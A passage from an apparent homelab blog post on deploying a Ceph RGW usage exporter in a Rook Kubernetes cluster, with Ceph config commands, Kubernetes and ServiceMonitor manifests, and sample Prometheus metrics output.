</span></span><span style="display:flex;"><span>                            <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">315</span>
</span></span><span style="display:flex;"><span>                        }
</span></span><span style="display:flex;"><span>                        [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                    ],
</span></span><span style="display:flex;"><span>                }
</span></span><span style="display:flex;"><span>            ]
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;summary&#34;</span>: [
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;user&#34;</span>: <span style="color:#e6db74">&#34;blog&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;categories&#34;</span>: [
</span></span><span style="display:flex;"><span>                [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;get_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">77373327028</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">1832858</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">1779988</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;category&#34;</span>: <span style="color:#e6db74">&#34;put_obj&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">293350218</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">7572</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">7572</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;total&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;bytes_sent&#34;</span>: <span style="color:#ae81ff">77408103266</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;bytes_received&#34;</span>: <span style="color:#ae81ff">293350218</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;ops&#34;</span>: <span style="color:#ae81ff">1840790</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;successful_ops&#34;</span>: <span style="color:#ae81ff">1787784</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;bytes_processed&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;bytes_returned&#34;</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>For this data to be gathered and made available, the option <code>rgw_enable_usage_log = true</code>
needs to be configured in the MON config database or directly in the RGW <code>ceph.conf</code>
file. In my case at least, the option seemed to be enabled by default, but I&rsquo;m
not sure whether I enabled it at some point, or whether it was enabled by Rook.</p>
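<p>In case the usage log is not yet enabled in your cluster, it can be switched on
via the MON config database. A minimal sketch, assuming the RGWs read their options
from the <code>client.rgw</code> config section and may need a restart to pick up
the change:</p>
<pre tabindex="0"><code># Check whether the usage log is already enabled for the RGW daemons
ceph config get client.rgw rgw_enable_usage_log

# If not, enable it in the MON config database
ceph config set client.rgw rgw_enable_usage_log true
</code></pre>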
<p>The next step was building the container image for the exporter, using the Dockerfile
already available <a href="https://github.com/blemmenes/radosgw_usage_exporter/blob/master/Dockerfile">in the repository</a>.</p>
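<p>The build itself was unspectacular. A rough sketch, assuming a plain Docker setup
and reusing the image tag from the Deployment further down, not necessarily the exact
commands I ran:</p>
<pre tabindex="0"><code>git clone https://github.com/blemmenes/radosgw_usage_exporter.git
cd radosgw_usage_exporter

# Build the image from the Dockerfile shipped in the repository and push it
# to the Homelab registry
docker build -t images.example.com/homelab/rgw-exporter:0.1 .
docker push images.example.com/homelab/rgw-exporter:0.1
</code></pre>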
<p>Then came the deployment into my k8s cluster. I based my deployment on the
example files for a Rook Ceph deployment also provided <a href="https://github.com/blemmenes/radosgw_usage_exporter/tree/master/examples/k8s/k8s">in the repository</a>.</p>
<p>First, the Ceph RGW user, so the exporter can access the Usage API:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#ae81ff">buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">bucket</span>: <span style="color:#ae81ff">read</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>: <span style="color:#ae81ff">read</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">usage</span>: <span style="color:#ae81ff">read</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">user</span>: <span style="color:#ae81ff">read</span>
</span></span></code></pre></div><p>Then the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">image</span>: <span style="color:#ae81ff">images.example.com/homelab/rgw-exporter:0.1</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SECRET_KEY</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">RADOSGW_SERVER</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">key</span>: <span style="color:#ae81ff">Endpoint</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-buckets-usage-exporter</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">VIRTUAL_PORT</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;9242&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">STORE</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">LOG_LEVEL</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#ae81ff">INFO</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">TIMEOUT</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;60&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>        - --<span style="color:#ae81ff">insecure</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">exporter</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">9242</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">40Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">10m</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">40Mi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tcpSocket</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tcpSocket</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">allowPrivilegeEscalation</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">capabilities</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">drop</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">ALL</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">readOnlyRootFilesystem</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsNonRoot</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsUser</span>: <span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><p>Next, the Service for the exporter:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">9242</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">9242</span>
</span></span></code></pre></div><p>And last but certainly not least, the <a href="https://prometheus-operator.dev/docs/api-reference/api/#monitoring.coreos.com/v1.ServiceMonitor">ServiceMonitor</a>,
which tells the Prometheus Operator to scrape the exporter:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceMonitor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpoints</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">honorLabels</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">interval</span>: <span style="color:#ae81ff">90s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/metrics</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrapeTimeout</span>: <span style="color:#ae81ff">60s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;python_gc_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;process_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;radosgw_usage_bucket_quota_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;radosgw_usage_user_quota_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;radosgw_usage_user_bucket_quota_.*&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;(get_bucket_encryption|get_bucket_object_lock|get_bucket_policy|get_bucket_tags|get_cors|get_lifecycle|get_acls|get_bucket_location|get_bucket_policy|get_bucket_public_access_block|get_bucket_versioning|get_request_payment|put_acls|put_bucket_policy|stat_bucket|delete_bucket_policy|get_bucket_replication)&#39;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceLabels</span>: [<span style="color:#ae81ff">category]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jobLabel</span>: <span style="color:#ae81ff">rgw-exporter</span>
</span></span></code></pre></div><p>This is the only part of the example where I made major changes. First, there are
as always a few metrics from the exporter itself, which I&rsquo;m never interested in.
Then, I&rsquo;m also dropping some quota-related data, because I don&rsquo;t use quotas at
all. And finally, the exporter provides data on many types of S3 operations per
user/bucket, which leads to quite a lot of data. But I&rsquo;m not interested in the
data for low-frequency operations like <code>put_acls</code> for example. So I drop
those as well.</p>
<p>I deployed all of this into my Rook cluster namespace (not the Rook operator namespace!).</p>
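<p>Rolling it out and smoke testing it boils down to something like the following
sketch, assuming the cluster namespace is called <code>rook-cluster</code> as in the
<code>CephObjectStoreUser</code> above and that all manifests sit in a local
<code>rgw-exporter/</code> directory:</p>
<pre tabindex="0"><code># Apply the user, Deployment, Service and ServiceMonitor into the Rook cluster namespace
kubectl apply -n rook-cluster -f rgw-exporter/

# Quick check that the exporter answers, with the port-forward running in a second terminal
kubectl -n rook-cluster port-forward deploy/rgw-exporter 9242:9242
curl -s http://localhost:9242/metrics | head -n 20
</code></pre>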
<p>Before going to the dashboards, here&rsquo;s a small overview of the data provided by
the exporter:</p>
<pre tabindex="0"><code># HELP radosgw_usage_ops_total Number of operations
# TYPE radosgw_usage_ops_total counter
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_bucket_encryption&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_bucket_object_lock&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_bucket_policy&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.0
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_bucket_tags&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;-&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 52742.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;create_bucket&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_bucket_policy&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 3.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_bucket_public_access_block&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_bucket_versioning&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.78032e+06
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_request_payment&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;list_bucket&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 164.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;post_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 123.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;put_bucket_policy&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;put_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 7572.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;stat_bucket&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;multi_object_delete&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 4.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;copy_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 14.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_acls&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 14.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;put_acls&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 14.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;get_obj_layout&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 2.0
radosgw_usage_ops_total{bucket=&#34;blog&#34;,category=&#34;options_cors&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 4.0
# HELP radosgw_usage_successful_ops_total Number of successful operations
# TYPE radosgw_usage_successful_ops_total counter
radosgw_usage_successful_ops_total{bucket=&#34;blog&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.780191e+06
# HELP radosgw_usage_sent_bytes_total Bytes sent by the RADOSGW
# TYPE radosgw_usage_sent_bytes_total counter
radosgw_usage_sent_bytes_total{bucket=&#34;blog&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 7.7364643823e+010
# HELP radosgw_usage_received_bytes_total Bytes received by the RADOSGW
# TYPE radosgw_usage_received_bytes_total counter
radosgw_usage_received_bytes_total{bucket=&#34;blog&#34;,category=&#34;get_obj&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 0.0
# HELP radosgw_usage_bucket_utilized_bytes Bucket utilized bytes
# TYPE radosgw_usage_bucket_utilized_bytes gauge
radosgw_usage_bucket_utilized_bytes{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 1.03238176e+08
# HELP radosgw_usage_bucket_objects Number of objects in bucket
# TYPE radosgw_usage_bucket_objects gauge
radosgw_usage_bucket_objects{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 934.0
# HELP radosgw_usage_bucket_quota_enabled Quota enabled for bucket
# TYPE radosgw_usage_bucket_quota_enabled gauge
radosgw_usage_bucket_quota_enabled{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 0.0
# HELP radosgw_usage_bucket_quota_size Maximum allowed bucket size
# TYPE radosgw_usage_bucket_quota_size gauge
radosgw_usage_bucket_quota_size{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} -1.0
# HELP radosgw_usage_bucket_quota_size_bytes Maximum allowed bucket size in bytes
# TYPE radosgw_usage_bucket_quota_size_bytes gauge
radosgw_usage_bucket_quota_size_bytes{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 0.0
# HELP radosgw_usage_bucket_quota_size_objects Maximum allowed bucket size in number of objects
# TYPE radosgw_usage_bucket_quota_size_objects gauge
radosgw_usage_bucket_quota_size_objects{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} -1.0
# HELP radosgw_usage_bucket_shards Number ob shards in bucket
# TYPE radosgw_usage_bucket_shards gauge
radosgw_usage_bucket_shards{bucket=&#34;blog&#34;,category=&#34;a2367ad5-81df-4ab3-8b6b-cae4bd659f64&#34;,owner=&#34;blog&#34;,store=&#34;rgw-bulk&#34;} 11.0
# HELP radosgw_user_metadata User metadata
# TYPE radosgw_user_metadata gauge
radosgw_user_metadata{display_name=&#34;User for the blog&#34;,email=&#34;&#34;,storage_class=&#34;&#34;,store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 1.0
# HELP radosgw_usage_user_quota_enabled User quota enabled
# TYPE radosgw_usage_user_quota_enabled gauge
radosgw_usage_user_quota_enabled{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 0.0
# HELP radosgw_usage_user_quota_size Maximum allowed size for user
# TYPE radosgw_usage_user_quota_size gauge
radosgw_usage_user_quota_size{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} -1.0
# HELP radosgw_usage_user_quota_size_bytes Maximum allowed size in bytes for user
# TYPE radosgw_usage_user_quota_size_bytes gauge
radosgw_usage_user_quota_size_bytes{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 0.0
# HELP radosgw_usage_user_quota_size_objects Maximum allowed number of objects across all user buckets
# TYPE radosgw_usage_user_quota_size_objects gauge
radosgw_usage_user_quota_size_objects{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} -1.0
# HELP radosgw_usage_user_bucket_quota_enabled User per-bucket-quota enabled
# TYPE radosgw_usage_user_bucket_quota_enabled gauge
radosgw_usage_user_bucket_quota_enabled{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} 0.0
# HELP radosgw_usage_user_bucket_quota_size Maximum allowed size for each bucket of user
# TYPE radosgw_usage_user_bucket_quota_size gauge
radosgw_usage_user_bucket_quota_size{store=&#34;rgw-bulk&#34;,user=&#34;blog&#34;} -1.0
